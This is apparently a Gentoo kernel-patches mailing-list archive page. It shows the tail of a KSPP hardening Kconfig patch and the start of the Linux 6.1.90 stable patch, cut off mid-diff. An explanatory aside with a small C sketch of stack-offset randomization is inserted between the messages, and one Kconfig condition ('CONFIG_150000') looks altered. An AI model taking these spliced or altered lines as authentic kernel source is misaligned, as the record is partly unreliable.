++	select UNWIND_PATCH_PAC_INTO_SCS if (CC_IS_CLANG=y && CLANG_VERSION >= CONFIG_150000 ) && ( ARM64_PTR_AUTH_KERNEL=y && CC_HAS_BRANCH_PROT_PAC_RET=y ) && ( SHADOW_CALL_STACK=y )
 +	select VMAP_STACK
 +
 +config GENTOO_KERNEL_SELF_PROTECTION_X86_32
@@ -304,26 +319,6 @@
 +		See the settings that become available for more details and fine-tuning.
 +
 +endmenu
-index 9e921fc72..f29bc13fa 100644
---- a/security/selinux/Kconfig
-+++ b/security/selinux/Kconfig
-@@ -26,6 +26,7 @@ config SECURITY_SELINUX_BOOTPARAM
- config SECURITY_SELINUX_DISABLE
- 	bool "NSA SELinux runtime disable"
- 	depends on SECURITY_SELINUX
-+	depends on !GENTOO_KERNEL_SELF_PROTECTION
- 	select SECURITY_WRITABLE_HOOKS
- 	default n
- 	help
--- 
-2.31.1
-
-From bd3ff0b16792c18c0614c2b95e148943209f460a Mon Sep 17 00:00:00 2001
-From: Georgy Yakovlev <gyakovlev@gentoo.org>
-Date: Tue, 8 Jun 2021 13:59:57 -0700
-Subject: [PATCH 2/2] set DEFAULT_MMAP_MIN_ADDR by default
-
----
  mm/Kconfig | 2 ++
  1 file changed, 2 insertions(+)
 

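Among the options the updated KSPP patch above selects is RANDOMIZE_KSTACK_OFFSET_DEFAULT, which makes the kernel offset the stack pointer by a few random bits on each syscall entry so the exact frame layout cannot be predicted across calls. Below is a minimal userspace sketch of the idea only, not the kernel's implementation; the 10-bit mask mirrors the kernel's default range, while the +1, the seeding, and the helper names are illustrative choices.

#include <stdio.h>
#include <stdlib.h>
#include <time.h>

static void syscall_body(void)
{
	int probe;
	/* The local's address shifts between calls because of the pad. */
	printf("frame near %p\n", (void *)&probe);
}

static void dispatch(unsigned int entropy)
{
	/* Grow this frame by a random 1..1024 bytes before doing the real
	 * work, roughly as the kernel does per syscall (it uses
	 * __builtin_alloca with a masked per-cpu entropy value). */
	volatile char *pad = __builtin_alloca((entropy & 0x3ff) + 1);

	pad[0] = 0;	/* keep the allocation from being optimized away */
	syscall_body();
}

int main(void)
{
	srand((unsigned int)time(NULL));

	for (int i = 0; i < 3; i++)
		dispatch((unsigned int)rand());
	return 0;
}
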

* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-05-02 15:01 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-05-02 15:01 UTC (permalink / raw
  To: gentoo-commits

commit:     5932c07fdc5b0460fb7007a450b095e3ff4f3cc0
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Thu May  2 15:01:37 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Thu May  2 15:01:37 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=5932c07f

Linux patch 6.1.90

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |    4 +
 1089_linux-6.1.90.patch | 3634 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 3638 insertions(+)

diff --git a/0000_README b/0000_README
index d6fe6f2d..1123ae49 100644
--- a/0000_README
+++ b/0000_README
@@ -399,6 +399,10 @@ Patch:  1088_linux-6.1.89.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.89
 
+Patch:  1089_linux-6.1.90.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.90
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1089_linux-6.1.90.patch b/1089_linux-6.1.90.patch
new file mode 100644
index 00000000..d5c9c046
--- /dev/null
+++ b/1089_linux-6.1.90.patch
@@ -0,0 +1,3634 @@
+diff --git a/Documentation/admin-guide/sysctl/net.rst b/Documentation/admin-guide/sysctl/net.rst
+index 6394f5dc2303d..e3894c928118c 100644
+--- a/Documentation/admin-guide/sysctl/net.rst
++++ b/Documentation/admin-guide/sysctl/net.rst
+@@ -205,6 +205,11 @@ Will increase power usage.
+ 
+ Default: 0 (off)
+ 
++mem_pcpu_rsv
++------------
++
++Per-cpu reserved forward alloc cache size in page units. Default 1MB per CPU.
++
+ rmem_default
+ ------------
+ 
+diff --git a/Makefile b/Makefile
+index a0472e1cf7156..7ae5cf9ec9e55 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 89
++SUBLEVEL = 90
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/Kconfig b/arch/Kconfig
+index f99fd9a4ca778..e959abf969ec3 100644
+--- a/arch/Kconfig
++++ b/arch/Kconfig
+@@ -9,6 +9,14 @@
+ #
+ source "arch/$(SRCARCH)/Kconfig"
+ 
++config ARCH_CONFIGURES_CPU_MITIGATIONS
++	bool
++
++if !ARCH_CONFIGURES_CPU_MITIGATIONS
++config CPU_MITIGATIONS
++	def_bool y
++endif
++
+ menu "General architecture-dependent options"
+ 
+ config CRASH_CORE
+diff --git a/arch/arc/boot/dts/hsdk.dts b/arch/arc/boot/dts/hsdk.dts
+index 6691f42550778..41b980df862b1 100644
+--- a/arch/arc/boot/dts/hsdk.dts
++++ b/arch/arc/boot/dts/hsdk.dts
+@@ -205,7 +205,6 @@ dmac_cfg_clk: dmac-gpu-cfg-clk {
+ 		};
+ 
+ 		gmac: ethernet@8000 {
+-			#interrupt-cells = <1>;
+ 			compatible = "snps,dwmac";
+ 			reg = <0x8000 0x2000>;
+ 			interrupts = <10>;
+diff --git a/arch/arm/boot/dts/at91-sama7g5ek.dts b/arch/arm/boot/dts/at91-sama7g5ek.dts
+index 4af8a1c96ed63..bede6e88ae110 100644
+--- a/arch/arm/boot/dts/at91-sama7g5ek.dts
++++ b/arch/arm/boot/dts/at91-sama7g5ek.dts
+@@ -293,7 +293,7 @@ vddcore: VDD_CORE {
+ 
+ 					regulator-state-standby {
+ 						regulator-on-in-suspend;
+-						regulator-suspend-voltage = <1150000>;
++						regulator-suspend-microvolt = <1150000>;
+ 						regulator-mode = <4>;
+ 					};
+ 
+@@ -314,7 +314,7 @@ vddcpu: VDD_OTHER {
+ 
+ 					regulator-state-standby {
+ 						regulator-on-in-suspend;
+-						regulator-suspend-voltage = <1050000>;
++						regulator-suspend-microvolt = <1050000>;
+ 						regulator-mode = <4>;
+ 					};
+ 
+@@ -331,7 +331,7 @@ vldo1: LDO1 {
+ 					regulator-always-on;
+ 
+ 					regulator-state-standby {
+-						regulator-suspend-voltage = <1800000>;
++						regulator-suspend-microvolt = <1800000>;
+ 						regulator-on-in-suspend;
+ 					};
+ 
+@@ -346,7 +346,7 @@ vldo2: LDO2 {
+ 					regulator-max-microvolt = <3700000>;
+ 
+ 					regulator-state-standby {
+-						regulator-suspend-voltage = <1800000>;
++						regulator-suspend-microvolt = <1800000>;
+ 						regulator-on-in-suspend;
+ 					};
+ 
+diff --git a/arch/arm64/boot/dts/mediatek/mt2712-evb.dts b/arch/arm64/boot/dts/mediatek/mt2712-evb.dts
+index d31a194124c91..03fd9df16999e 100644
+--- a/arch/arm64/boot/dts/mediatek/mt2712-evb.dts
++++ b/arch/arm64/boot/dts/mediatek/mt2712-evb.dts
+@@ -128,7 +128,7 @@ ethernet_phy0: ethernet-phy@5 {
+ };
+ 
+ &pio {
+-	eth_default: eth_default {
++	eth_default: eth-default-pins {
+ 		tx_pins {
+ 			pinmux = <MT2712_PIN_71_GBE_TXD3__FUNC_GBE_TXD3>,
+ 				 <MT2712_PIN_72_GBE_TXD2__FUNC_GBE_TXD2>,
+@@ -155,7 +155,7 @@ mdio_pins {
+ 		};
+ 	};
+ 
+-	eth_sleep: eth_sleep {
++	eth_sleep: eth-sleep-pins {
+ 		tx_pins {
+ 			pinmux = <MT2712_PIN_71_GBE_TXD3__FUNC_GPIO71>,
+ 				 <MT2712_PIN_72_GBE_TXD2__FUNC_GPIO72>,
+@@ -181,14 +181,14 @@ mdio_pins {
+ 		};
+ 	};
+ 
+-	usb0_id_pins_float: usb0_iddig {
++	usb0_id_pins_float: usb0-iddig-pins {
+ 		pins_iddig {
+ 			pinmux = <MT2712_PIN_12_IDDIG_P0__FUNC_IDDIG_A>;
+ 			bias-pull-up;
+ 		};
+ 	};
+ 
+-	usb1_id_pins_float: usb1_iddig {
++	usb1_id_pins_float: usb1-iddig-pins {
+ 		pins_iddig {
+ 			pinmux = <MT2712_PIN_14_IDDIG_P1__FUNC_IDDIG_B>;
+ 			bias-pull-up;
+diff --git a/arch/arm64/boot/dts/mediatek/mt2712e.dtsi b/arch/arm64/boot/dts/mediatek/mt2712e.dtsi
+index 1ac0b2cf3d406..fde2b165f55d2 100644
+--- a/arch/arm64/boot/dts/mediatek/mt2712e.dtsi
++++ b/arch/arm64/boot/dts/mediatek/mt2712e.dtsi
+@@ -249,10 +249,11 @@ topckgen: syscon@10000000 {
+ 		#clock-cells = <1>;
+ 	};
+ 
+-	infracfg: syscon@10001000 {
++	infracfg: clock-controller@10001000 {
+ 		compatible = "mediatek,mt2712-infracfg", "syscon";
+ 		reg = <0 0x10001000 0 0x1000>;
+ 		#clock-cells = <1>;
++		#reset-cells = <1>;
+ 	};
+ 
+ 	pericfg: syscon@10003000 {
+diff --git a/arch/arm64/boot/dts/mediatek/mt7622.dtsi b/arch/arm64/boot/dts/mediatek/mt7622.dtsi
+index 7bb316922a3a9..f8a32006885bb 100644
+--- a/arch/arm64/boot/dts/mediatek/mt7622.dtsi
++++ b/arch/arm64/boot/dts/mediatek/mt7622.dtsi
+@@ -251,7 +251,7 @@ scpsys: power-controller@10006000 {
+ 		clock-names = "hif_sel";
+ 	};
+ 
+-	cir: cir@10009000 {
++	cir: ir-receiver@10009000 {
+ 		compatible = "mediatek,mt7622-cir";
+ 		reg = <0 0x10009000 0 0x1000>;
+ 		interrupts = <GIC_SPI 175 IRQ_TYPE_LEVEL_LOW>;
+@@ -282,16 +282,14 @@ thermal_calibration: calib@198 {
+ 		};
+ 	};
+ 
+-	apmixedsys: apmixedsys@10209000 {
+-		compatible = "mediatek,mt7622-apmixedsys",
+-			     "syscon";
++	apmixedsys: clock-controller@10209000 {
++		compatible = "mediatek,mt7622-apmixedsys";
+ 		reg = <0 0x10209000 0 0x1000>;
+ 		#clock-cells = <1>;
+ 	};
+ 
+-	topckgen: topckgen@10210000 {
+-		compatible = "mediatek,mt7622-topckgen",
+-			     "syscon";
++	topckgen: clock-controller@10210000 {
++		compatible = "mediatek,mt7622-topckgen";
+ 		reg = <0 0x10210000 0 0x1000>;
+ 		#clock-cells = <1>;
+ 	};
+@@ -514,7 +512,6 @@ thermal: thermal@1100b000 {
+ 			 <&pericfg CLK_PERI_AUXADC_PD>;
+ 		clock-names = "therm", "auxadc";
+ 		resets = <&pericfg MT7622_PERI_THERM_SW_RST>;
+-		reset-names = "therm";
+ 		mediatek,auxadc = <&auxadc>;
+ 		mediatek,apmixedsys = <&apmixedsys>;
+ 		nvmem-cells = <&thermal_calibration>;
+@@ -734,9 +731,8 @@ wmac: wmac@18000000 {
+ 		power-domains = <&scpsys MT7622_POWER_DOMAIN_WB>;
+ 	};
+ 
+-	ssusbsys: ssusbsys@1a000000 {
+-		compatible = "mediatek,mt7622-ssusbsys",
+-			     "syscon";
++	ssusbsys: clock-controller@1a000000 {
++		compatible = "mediatek,mt7622-ssusbsys";
+ 		reg = <0 0x1a000000 0 0x1000>;
+ 		#clock-cells = <1>;
+ 		#reset-cells = <1>;
+@@ -793,9 +789,8 @@ u2port1: usb-phy@1a0c5000 {
+ 		};
+ 	};
+ 
+-	pciesys: pciesys@1a100800 {
+-		compatible = "mediatek,mt7622-pciesys",
+-			     "syscon";
++	pciesys: clock-controller@1a100800 {
++		compatible = "mediatek,mt7622-pciesys";
+ 		reg = <0 0x1a100800 0 0x1000>;
+ 		#clock-cells = <1>;
+ 		#reset-cells = <1>;
+@@ -921,12 +916,13 @@ sata_port: sata-phy@1a243000 {
+ 		};
+ 	};
+ 
+-	hifsys: syscon@1af00000 {
+-		compatible = "mediatek,mt7622-hifsys", "syscon";
++	hifsys: clock-controller@1af00000 {
++		compatible = "mediatek,mt7622-hifsys";
+ 		reg = <0 0x1af00000 0 0x70>;
++		#clock-cells = <1>;
+ 	};
+ 
+-	ethsys: syscon@1b000000 {
++	ethsys: clock-controller@1b000000 {
+ 		compatible = "mediatek,mt7622-ethsys",
+ 			     "syscon";
+ 		reg = <0 0x1b000000 0 0x1000>;
+@@ -966,9 +962,7 @@ wed1: wed@1020b000 {
+ 	};
+ 
+ 	eth: ethernet@1b100000 {
+-		compatible = "mediatek,mt7622-eth",
+-			     "mediatek,mt2701-eth",
+-			     "syscon";
++		compatible = "mediatek,mt7622-eth";
+ 		reg = <0 0x1b100000 0 0x20000>;
+ 		interrupts = <GIC_SPI 223 IRQ_TYPE_LEVEL_LOW>,
+ 			     <GIC_SPI 224 IRQ_TYPE_LEVEL_LOW>,
+diff --git a/arch/arm64/boot/dts/mediatek/mt8183.dtsi b/arch/arm64/boot/dts/mediatek/mt8183.dtsi
+index d5d9b954c449a..2147e152683bf 100644
+--- a/arch/arm64/boot/dts/mediatek/mt8183.dtsi
++++ b/arch/arm64/boot/dts/mediatek/mt8183.dtsi
+@@ -1554,6 +1554,7 @@ mfgcfg: syscon@13000000 {
+ 			compatible = "mediatek,mt8183-mfgcfg", "syscon";
+ 			reg = <0 0x13000000 0 0x1000>;
+ 			#clock-cells = <1>;
++			power-domains = <&spm MT8183_POWER_DOMAIN_MFG_ASYNC>;
+ 		};
+ 
+ 		gpu: gpu@13040000 {
+diff --git a/arch/arm64/boot/dts/mediatek/mt8192-asurada.dtsi b/arch/arm64/boot/dts/mediatek/mt8192-asurada.dtsi
+index c6080af1e4a30..0814ed6a7272d 100644
+--- a/arch/arm64/boot/dts/mediatek/mt8192-asurada.dtsi
++++ b/arch/arm64/boot/dts/mediatek/mt8192-asurada.dtsi
+@@ -903,7 +903,7 @@ regulators {
+ 			mt6315_6_vbuck1: vbuck1 {
+ 				regulator-compatible = "vbuck1";
+ 				regulator-name = "Vbcpu";
+-				regulator-min-microvolt = <300000>;
++				regulator-min-microvolt = <400000>;
+ 				regulator-max-microvolt = <1193750>;
+ 				regulator-enable-ramp-delay = <256>;
+ 				regulator-allowed-modes = <0 1 2>;
+@@ -913,7 +913,7 @@ mt6315_6_vbuck1: vbuck1 {
+ 			mt6315_6_vbuck3: vbuck3 {
+ 				regulator-compatible = "vbuck3";
+ 				regulator-name = "Vlcpu";
+-				regulator-min-microvolt = <300000>;
++				regulator-min-microvolt = <400000>;
+ 				regulator-max-microvolt = <1193750>;
+ 				regulator-enable-ramp-delay = <256>;
+ 				regulator-allowed-modes = <0 1 2>;
+@@ -930,7 +930,7 @@ regulators {
+ 			mt6315_7_vbuck1: vbuck1 {
+ 				regulator-compatible = "vbuck1";
+ 				regulator-name = "Vgpu";
+-				regulator-min-microvolt = <606250>;
++				regulator-min-microvolt = <400000>;
+ 				regulator-max-microvolt = <800000>;
+ 				regulator-enable-ramp-delay = <256>;
+ 				regulator-allowed-modes = <0 1 2>;
+diff --git a/arch/arm64/boot/dts/mediatek/mt8192.dtsi b/arch/arm64/boot/dts/mediatek/mt8192.dtsi
+index 4ed8a0f187583..7ecba8c7262da 100644
+--- a/arch/arm64/boot/dts/mediatek/mt8192.dtsi
++++ b/arch/arm64/boot/dts/mediatek/mt8192.dtsi
+@@ -1240,6 +1240,7 @@ mutex: mutex@14001000 {
+ 			reg = <0 0x14001000 0 0x1000>;
+ 			interrupts = <GIC_SPI 252 IRQ_TYPE_LEVEL_HIGH 0>;
+ 			clocks = <&mmsys CLK_MM_DISP_MUTEX0>;
++			mediatek,gce-client-reg = <&gce SUBSYS_1400XXXX 0x1000 0x1000>;
+ 			mediatek,gce-events = <CMDQ_EVENT_DISP_STREAM_DONE_ENG_EVENT_0>,
+ 					      <CMDQ_EVENT_DISP_STREAM_DONE_ENG_EVENT_1>;
+ 			power-domains = <&spm MT8192_POWER_DOMAIN_DISP>;
+diff --git a/arch/arm64/boot/dts/mediatek/mt8195-cherry.dtsi b/arch/arm64/boot/dts/mediatek/mt8195-cherry.dtsi
+index 4b8a1c462906e..9180a73db066e 100644
+--- a/arch/arm64/boot/dts/mediatek/mt8195-cherry.dtsi
++++ b/arch/arm64/boot/dts/mediatek/mt8195-cherry.dtsi
+@@ -845,7 +845,7 @@ regulators {
+ 			mt6315_6_vbuck1: vbuck1 {
+ 				regulator-compatible = "vbuck1";
+ 				regulator-name = "Vbcpu";
+-				regulator-min-microvolt = <300000>;
++				regulator-min-microvolt = <400000>;
+ 				regulator-max-microvolt = <1193750>;
+ 				regulator-enable-ramp-delay = <256>;
+ 				regulator-ramp-delay = <6250>;
+@@ -863,7 +863,7 @@ regulators {
+ 			mt6315_7_vbuck1: vbuck1 {
+ 				regulator-compatible = "vbuck1";
+ 				regulator-name = "Vgpu";
+-				regulator-min-microvolt = <625000>;
++				regulator-min-microvolt = <400000>;
+ 				regulator-max-microvolt = <1193750>;
+ 				regulator-enable-ramp-delay = <256>;
+ 				regulator-ramp-delay = <6250>;
+diff --git a/arch/arm64/boot/dts/mediatek/mt8195.dtsi b/arch/arm64/boot/dts/mediatek/mt8195.dtsi
+index 414cbe3451270..bdf002e9cece1 100644
+--- a/arch/arm64/boot/dts/mediatek/mt8195.dtsi
++++ b/arch/arm64/boot/dts/mediatek/mt8195.dtsi
+@@ -1492,6 +1492,7 @@ vppsys0: clock-controller@14000000 {
+ 			compatible = "mediatek,mt8195-vppsys0";
+ 			reg = <0 0x14000000 0 0x1000>;
+ 			#clock-cells = <1>;
++			mediatek,gce-client-reg = <&gce1 SUBSYS_1400XXXX 0 0x1000>;
+ 		};
+ 
+ 		smi_sub_common_vpp0_vpp1_2x1: smi@14010000 {
+@@ -1597,6 +1598,7 @@ vppsys1: clock-controller@14f00000 {
+ 			compatible = "mediatek,mt8195-vppsys1";
+ 			reg = <0 0x14f00000 0 0x1000>;
+ 			#clock-cells = <1>;
++			mediatek,gce-client-reg = <&gce1 SUBSYS_14f0XXXX 0 0x1000>;
+ 		};
+ 
+ 		larb5: larb@14f02000 {
+@@ -1982,6 +1984,7 @@ vdosys0: syscon@1c01a000 {
+ 			reg = <0 0x1c01a000 0 0x1000>;
+ 			mboxes = <&gce0 0 CMDQ_THR_PRIO_4>;
+ 			#clock-cells = <1>;
++			mediatek,gce-client-reg = <&gce0 SUBSYS_1c01XXXX 0xa000 0x1000>;
+ 		};
+ 
+ 		larb20: larb@1b010000 {
+@@ -2085,6 +2088,7 @@ mutex: mutex@1c016000 {
+ 			interrupts = <GIC_SPI 658 IRQ_TYPE_LEVEL_HIGH 0>;
+ 			power-domains = <&spm MT8195_POWER_DOMAIN_VDOSYS0>;
+ 			clocks = <&vdosys0 CLK_VDO0_DISP_MUTEX0>;
++			mediatek,gce-client-reg = <&gce0 SUBSYS_1c01XXXX 0x6000 0x1000>;
+ 			mediatek,gce-events = <CMDQ_EVENT_VDO0_DISP_STREAM_DONE_0>;
+ 		};
+ 
+diff --git a/arch/arm64/boot/dts/rockchip/rk3399-pinebook-pro.dts b/arch/arm64/boot/dts/rockchip/rk3399-pinebook-pro.dts
+index 194e48c755f6b..a51e8d0493cab 100644
+--- a/arch/arm64/boot/dts/rockchip/rk3399-pinebook-pro.dts
++++ b/arch/arm64/boot/dts/rockchip/rk3399-pinebook-pro.dts
+@@ -789,7 +789,6 @@ &pcie_phy {
+ };
+ 
+ &pcie0 {
+-	bus-scan-delay-ms = <1000>;
+ 	ep-gpios = <&gpio2 RK_PD4 GPIO_ACTIVE_HIGH>;
+ 	num-lanes = <4>;
+ 	pinctrl-names = "default";
+diff --git a/arch/arm64/boot/dts/rockchip/rk3399-puma.dtsi b/arch/arm64/boot/dts/rockchip/rk3399-puma.dtsi
+index aa3e21bd6c8f4..937a15005eb0e 100644
+--- a/arch/arm64/boot/dts/rockchip/rk3399-puma.dtsi
++++ b/arch/arm64/boot/dts/rockchip/rk3399-puma.dtsi
+@@ -401,16 +401,22 @@ &io_domains {
+ 	gpio1830-supply = <&vcc_1v8>;
+ };
+ 
+-&pmu_io_domains {
+-	status = "okay";
+-	pmu1830-supply = <&vcc_1v8>;
+-};
+-
+-&pwm2 {
+-	status = "okay";
++&pcie_clkreqn_cpm {
++	rockchip,pins =
++		<2 RK_PD2 RK_FUNC_GPIO &pcfg_pull_up>;
+ };
+ 
+ &pinctrl {
++	pinctrl-names = "default";
++	pinctrl-0 = <&q7_thermal_pin>;
++
++	gpios {
++		q7_thermal_pin: q7-thermal-pin {
++			rockchip,pins =
++				<0 RK_PA3 RK_FUNC_GPIO &pcfg_pull_up>;
++		};
++	};
++
+ 	i2c8 {
+ 		i2c8_xfer_a: i2c8-xfer {
+ 			rockchip,pins =
+@@ -443,11 +449,20 @@ vcc5v0_host_en: vcc5v0-host-en {
+ 	usb3 {
+ 		usb3_id: usb3-id {
+ 			rockchip,pins =
+-			  <1 RK_PC2 RK_FUNC_GPIO &pcfg_pull_none>;
++			  <1 RK_PC2 RK_FUNC_GPIO &pcfg_pull_up>;
+ 		};
+ 	};
+ };
+ 
++&pmu_io_domains {
++	status = "okay";
++	pmu1830-supply = <&vcc_1v8>;
++};
++
++&pwm2 {
++	status = "okay";
++};
++
+ &sdhci {
+ 	/*
+ 	 * Signal integrity isn't great at 200MHz but 100MHz has proven stable
+diff --git a/arch/arm64/boot/dts/rockchip/rk3568-bpi-r2-pro.dts b/arch/arm64/boot/dts/rockchip/rk3568-bpi-r2-pro.dts
+index 26d7fda275edb..856fe4b66a0b9 100644
+--- a/arch/arm64/boot/dts/rockchip/rk3568-bpi-r2-pro.dts
++++ b/arch/arm64/boot/dts/rockchip/rk3568-bpi-r2-pro.dts
+@@ -412,6 +412,8 @@ regulator-state-mem {
+ 
+ 			vccio_sd: LDO_REG5 {
+ 				regulator-name = "vccio_sd";
++				regulator-always-on;
++				regulator-boot-on;
+ 				regulator-min-microvolt = <1800000>;
+ 				regulator-max-microvolt = <3300000>;
+ 
+@@ -521,9 +523,9 @@ &mdio0 {
+ 	#address-cells = <1>;
+ 	#size-cells = <0>;
+ 
+-	switch@0 {
++	switch@1f {
+ 		compatible = "mediatek,mt7531";
+-		reg = <0>;
++		reg = <0x1f>;
+ 
+ 		ports {
+ 			#address-cells = <1>;
+diff --git a/arch/loongarch/include/asm/perf_event.h b/arch/loongarch/include/asm/perf_event.h
+index 2a35a0bc2aaab..52b638059e40b 100644
+--- a/arch/loongarch/include/asm/perf_event.h
++++ b/arch/loongarch/include/asm/perf_event.h
+@@ -7,6 +7,14 @@
+ #ifndef __LOONGARCH_PERF_EVENT_H__
+ #define __LOONGARCH_PERF_EVENT_H__
+ 
++#include <asm/ptrace.h>
++
+ #define perf_arch_bpf_user_pt_regs(regs) (struct user_pt_regs *)regs
+ 
++#define perf_arch_fetch_caller_regs(regs, __ip) { \
++	(regs)->csr_era = (__ip); \
++	(regs)->regs[3] = current_stack_pointer; \
++	(regs)->regs[22] = (unsigned long) __builtin_frame_address(0); \
++}
++
+ #endif /* __LOONGARCH_PERF_EVENT_H__ */
+diff --git a/arch/loongarch/mm/fault.c b/arch/loongarch/mm/fault.c
+index b829ab911a17b..007718d51f095 100644
+--- a/arch/loongarch/mm/fault.c
++++ b/arch/loongarch/mm/fault.c
+@@ -193,10 +193,10 @@ static void __kprobes __do_page_fault(struct pt_regs *regs,
+ 		if (!(vma->vm_flags & VM_WRITE))
+ 			goto bad_area;
+ 	} else {
+-		if (!(vma->vm_flags & VM_READ) && address != exception_era(regs))
+-			goto bad_area;
+ 		if (!(vma->vm_flags & VM_EXEC) && address == exception_era(regs))
+ 			goto bad_area;
++		if (!(vma->vm_flags & (VM_READ | VM_WRITE)) && address != exception_era(regs))
++			goto bad_area;
+ 	}
+ 
+ 	/*
+diff --git a/arch/riscv/include/asm/pgtable.h b/arch/riscv/include/asm/pgtable.h
+index 63055c6ad2c25..2d9416a6a070e 100644
+--- a/arch/riscv/include/asm/pgtable.h
++++ b/arch/riscv/include/asm/pgtable.h
+@@ -799,8 +799,8 @@ static inline pmd_t pmdp_establish(struct vm_area_struct *vma,
+ #define PAGE_SHARED		__pgprot(0)
+ #define PAGE_KERNEL		__pgprot(0)
+ #define swapper_pg_dir		NULL
+-#define TASK_SIZE		0xffffffffUL
+-#define VMALLOC_START		0
++#define TASK_SIZE		_AC(-1, UL)
++#define VMALLOC_START		_AC(0, UL)
+ #define VMALLOC_END		TASK_SIZE
+ 
+ #endif /* !CONFIG_MMU */
+diff --git a/arch/x86/Kconfig b/arch/x86/Kconfig
+index 5f7a86f240db7..49cea5b81649d 100644
+--- a/arch/x86/Kconfig
++++ b/arch/x86/Kconfig
+@@ -61,6 +61,7 @@ config X86
+ 	select ACPI_SYSTEM_POWER_STATES_SUPPORT	if ACPI
+ 	select ARCH_32BIT_OFF_T			if X86_32
+ 	select ARCH_CLOCKSOURCE_INIT
++	select ARCH_CONFIGURES_CPU_MITIGATIONS
+ 	select ARCH_CORRECT_STACKTRACE_ON_KRETPROBE
+ 	select ARCH_ENABLE_HUGEPAGE_MIGRATION if X86_64 && HUGETLB_PAGE && MIGRATION
+ 	select ARCH_ENABLE_MEMORY_HOTPLUG if X86_64
+@@ -2449,17 +2450,17 @@ config CC_HAS_SLS
+ config CC_HAS_RETURN_THUNK
+ 	def_bool $(cc-option,-mfunction-return=thunk-extern)
+ 
+-menuconfig SPECULATION_MITIGATIONS
+-	bool "Mitigations for speculative execution vulnerabilities"
++menuconfig CPU_MITIGATIONS
++	bool "Mitigations for CPU vulnerabilities"
+ 	default y
+ 	help
+-	  Say Y here to enable options which enable mitigations for
+-	  speculative execution hardware vulnerabilities.
++	  Say Y here to enable options which enable mitigations for hardware
++	  vulnerabilities (usually related to speculative execution).
+ 
+ 	  If you say N, all mitigations will be disabled. You really
+ 	  should know what you are doing to say so.
+ 
+-if SPECULATION_MITIGATIONS
++if CPU_MITIGATIONS
+ 
+ config PAGE_TABLE_ISOLATION
+ 	bool "Remove the kernel mapping in user mode"
+diff --git a/arch/x86/include/asm/coco.h b/arch/x86/include/asm/coco.h
+index 1f97d00ad8588..100a752c33bb3 100644
+--- a/arch/x86/include/asm/coco.h
++++ b/arch/x86/include/asm/coco.h
+@@ -13,9 +13,10 @@ enum cc_vendor {
+ };
+ 
+ extern enum cc_vendor cc_vendor;
+-extern u64 cc_mask;
+ 
+ #ifdef CONFIG_ARCH_HAS_CC_PLATFORM
++extern u64 cc_mask;
++
+ static inline void cc_set_mask(u64 mask)
+ {
+ 	RIP_REL_REF(cc_mask) = mask;
+@@ -25,6 +26,8 @@ u64 cc_mkenc(u64 val);
+ u64 cc_mkdec(u64 val);
+ void cc_random_init(void);
+ #else
++static const u64 cc_mask = 0;
++
+ static inline u64 cc_mkenc(u64 val)
+ {
+ 	return val;
+diff --git a/arch/x86/include/asm/pgtable_types.h b/arch/x86/include/asm/pgtable_types.h
+index f6116b66f2892..f0b9b37c4609b 100644
+--- a/arch/x86/include/asm/pgtable_types.h
++++ b/arch/x86/include/asm/pgtable_types.h
+@@ -127,7 +127,7 @@
+  */
+ #define _COMMON_PAGE_CHG_MASK	(PTE_PFN_MASK | _PAGE_PCD | _PAGE_PWT |	       \
+ 				 _PAGE_SPECIAL | _PAGE_ACCESSED | _PAGE_DIRTY |\
+-				 _PAGE_SOFT_DIRTY | _PAGE_DEVMAP | _PAGE_ENC | \
++				 _PAGE_SOFT_DIRTY | _PAGE_DEVMAP | _PAGE_CC | \
+ 				 _PAGE_UFFD_WP)
+ #define _PAGE_CHG_MASK	(_COMMON_PAGE_CHG_MASK | _PAGE_PAT)
+ #define _HPAGE_CHG_MASK (_COMMON_PAGE_CHG_MASK | _PAGE_PSE | _PAGE_PAT_LARGE)
+@@ -153,6 +153,7 @@ enum page_cache_mode {
+ };
+ #endif
+ 
++#define _PAGE_CC		(_AT(pteval_t, cc_mask))
+ #define _PAGE_ENC		(_AT(pteval_t, sme_me_mask))
+ 
+ #define _PAGE_CACHE_MASK	(_PAGE_PWT | _PAGE_PCD | _PAGE_PAT)
+diff --git a/arch/x86/kernel/process_64.c b/arch/x86/kernel/process_64.c
+index 7f94dbbc397b7..a0d3059bee3de 100644
+--- a/arch/x86/kernel/process_64.c
++++ b/arch/x86/kernel/process_64.c
+@@ -137,7 +137,7 @@ void __show_regs(struct pt_regs *regs, enum show_regs_mode mode,
+ 		       log_lvl, d3, d6, d7);
+ 	}
+ 
+-	if (cpu_feature_enabled(X86_FEATURE_OSPKE))
++	if (cr4 & X86_CR4_PKE)
+ 		printk("%sPKRU: %08x\n", log_lvl, read_pkru());
+ }
+ 
+diff --git a/crypto/algapi.c b/crypto/algapi.c
+index c73d1359b9d41..5dc9ccdd5a510 100644
+--- a/crypto/algapi.c
++++ b/crypto/algapi.c
+@@ -290,7 +290,6 @@ static struct crypto_larval *__crypto_register_alg(struct crypto_alg *alg)
+ 		}
+ 
+ 		if (!strcmp(q->cra_driver_name, alg->cra_name) ||
+-		    !strcmp(q->cra_driver_name, alg->cra_driver_name) ||
+ 		    !strcmp(q->cra_name, alg->cra_driver_name))
+ 			goto err;
+ 	}
+diff --git a/drivers/acpi/cppc_acpi.c b/drivers/acpi/cppc_acpi.c
+index 093675b1a1ffb..49339f37d9405 100644
+--- a/drivers/acpi/cppc_acpi.c
++++ b/drivers/acpi/cppc_acpi.c
+@@ -163,6 +163,13 @@ show_cppc_data(cppc_get_perf_caps, cppc_perf_caps, nominal_freq);
